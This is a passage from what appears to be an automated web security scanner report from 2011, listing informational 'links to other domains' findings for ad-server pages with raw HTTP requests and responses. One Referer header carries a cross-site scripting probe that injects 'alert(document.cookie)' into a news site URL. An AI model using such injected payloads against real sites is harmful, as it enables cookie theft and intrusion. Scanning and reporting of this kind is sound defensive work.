http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver

The response contains the following links to other domains:

http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http:/www.quatros.com
http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg

Request

GET /player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

18.93. http://as.jivox.com/player/jivox_ad_tags.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The page was loaded from a URL containing a query string:

http://as.jivox.com/player/jivox_ad_tags.php?t=1307963165819&r=0.34619523026049137&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=

The response contains the following links to other domains:

http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http:/www.quatros.com
http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg

Request

GET /player/jivox_ad_tags.php?t=1307963165819&r=0.34619523026049137&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:06:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57633
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
</object>';
}else{
tmpPlayerTag += ''
+ ' <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWR2OGZtbChnaWQkMWQ5NmU0NTYtOTVhZC0xMWUwLTk4NTMtNzc4ZTMyMzU0NzM5LHN0JDEzMDc5NjMxNTc5NDE0ODksc2kkMjQ1MjU1MSx2JDEuMCxhaWQkb0tCRVNFd05qZUEtLGN0JDI1LHlieCQwT2RvTTJhMjZHMFh3Qmk0SXloTHpnLHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">'
+ ' <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" border="0" width="300" height="250" alt="" />'
+ ' </a>
...[SNIP]...

18.94. http://as.jivox.com/player/jivox_ad_tags.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The page was loaded from a URL containing a query string:

http://as.jivox.com/player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=

The response contains the following links to other domains:

http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http:/www.quatros.com
http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:01:35 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57632
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
</object>';
}else{
tmpPlayerTag += ''
+ ' <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">'
+ ' <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" border="0" width="300" height="250" alt="" />'
+ ' </a>
...[SNIP]...

18.95. http://bidnw.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bidnw.ru4.com
Path:	/nf

Issue detail

The page was loaded from a URL containing a query string:

http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/x1.rtb/fingerhut/mass/rmkt;sz=728x90;ord=2951447?
http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?
http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?
http://ad.doubleclick.net/jump/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?

Request

GET /nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA= HTTP/1.1
Host: bidnw.ru4.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N2X2MyfFl8MTMwNzA2MDc5N3xzc3ZfMXwyODU0NDU1MDF8MTMwNzA2MDc5N3xzc3ZfYzR8WXwxMzA2NTM0NDg0fA==

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:07:17 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: O15607=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1326


<iframe src="http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=2951447?" target="_blank"><img src="http://ad.doubleclick.net/ad/x1.rtb/fingerhut/mass/rmkt;sz=728x90;ord=2951447?" width="728" height="90" border="0" alt=""></a></noscript>
<iframe src="http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?" width="0" frameborder="0" height="0" scrolling="no"></iframe>
...[SNIP]...

18.96. http://bidnw.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bidnw.ru4.com
Path:	/nf

Issue detail

The page was loaded from a URL containing a query string:

http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/x1.rtb/fingerhut/mass/rmkt;sz=728x90;ord=0932097?
http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?
http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?
http://ad.doubleclick.net/jump/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?

Request

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:01:35 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: O15607=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1326


<iframe src="http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=0932097?" target="_blank"><img src="http://ad.doubleclick.net/ad/x1.rtb/fingerhut/mass/rmkt;sz=728x90;ord=0932097?" width="728" height="90" border="0" alt=""></a></noscript>
<iframe src="http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?" width="0" frameborder="0" height="0" scrolling="no"></iframe>
...[SNIP]...

18.97. http://bn.xp1.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bn.xp1.ru4.com
Path:	/nf

Issue detail

The page was loaded from a URL containing a query string:

http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=&_wp=74273736E1DAEA47&_nv=1&_CDbg=18121040&_eo=747979&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAADFlxQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAAMtpCwAAAAAAAAAAAAAAAADLaQsAAAAAACgAAAAAAAAAYmE4MGM2ZDNlZTdhM2M4ZWRiODI3ZDlkYjM5ZmZjZDY4NTEwNDYyMQAAAAAAAAAAFAAAAAAAAABBRy0wMDAwMDAwMTM4OTM1ODU1NA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAkAAAAAAAAAGh0dHA6Ly9zcG9ydGRmdy5jb20vYWJvdXRjb250YWN0LXVzLwcAAAAAAAAAMTM0NjReXgIAAAAAAAAAMTkGAAAAHAAAAAAAAAAAAAAAAAAAAAC88PVNAAAAAA==

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/x1.rtb/fingerhut/mass/rmkt;sz=728x90;ord=7668881?
http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?
http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?
http://ad.doubleclick.net/jump/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?

Request

GET /nf?_pnot=0&_tpc=&_wp=74273736E1DAEA47&_nv=1&_CDbg=18121040&_eo=747979&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAADFlxQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAAMtpCwAAAAAAAAAAAAAAAADLaQsAAAAAACgAAAAAAAAAYmE4MGM2ZDNlZTdhM2M4ZWRiODI3ZDlkYjM5ZmZjZDY4NTEwNDYyMQAAAAAAAAAAFAAAAAAAAABBRy0wMDAwMDAwMTM4OTM1ODU1NA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAkAAAAAAAAAGh0dHA6Ly9zcG9ydGRmdy5jb20vYWJvdXRjb250YWN0LXVzLwcAAAAAAAAAMTM0NjReXgIAAAAAAAAAMTkGAAAAHAAAAAAAAAAAAAAAAAAAAAC88PVNAAAAAA== HTTP/1.1
Host: bn.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N2X2MyfFl8MTMwNzA2MDc5N3xzc3ZfMXwyODU0NDU1MDF8MTMwNzA2MDc5N3xzc3ZfYzR8WXwxMzA2NTM0NDg0fA==; 84218-B84223=0|0|0|0|0|66286|110253|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; 1780853-B1781017=7|0|0|0|0|1781032|1781031|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:21:00 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
